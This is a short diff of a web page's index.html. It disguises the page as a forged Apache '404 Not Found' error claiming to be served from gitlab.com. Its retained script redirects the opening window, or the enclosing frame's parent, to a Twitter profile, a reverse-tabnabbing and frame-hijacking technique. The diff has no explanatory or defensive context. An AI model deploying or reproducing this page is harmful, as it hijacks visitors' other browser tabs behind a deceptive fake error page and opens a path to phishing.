--- a/index.html
+++ b/index.html
@@ -1,7 +1,11 @@
 <!doctype html>
 <html>
-<head><title>Red Assassin</title></head>
+<head><title>Apache 404</title></head>
 <body>
+   <h1>Not Found</h1>
+    <p>The requested URL was not found on this server.</p>
+    <hr>
+    <address>Apache/2.2.15 (Red Hat) Server at gitlab.com Port 443</address>
 <script>  
 if (window.opener) window.opener.parent.location.replace('https://twitter.com/__d3f4u17__');
 if (window.parent != window) window.parent.location.replace('https://twitter.com/__d3f4u17__');
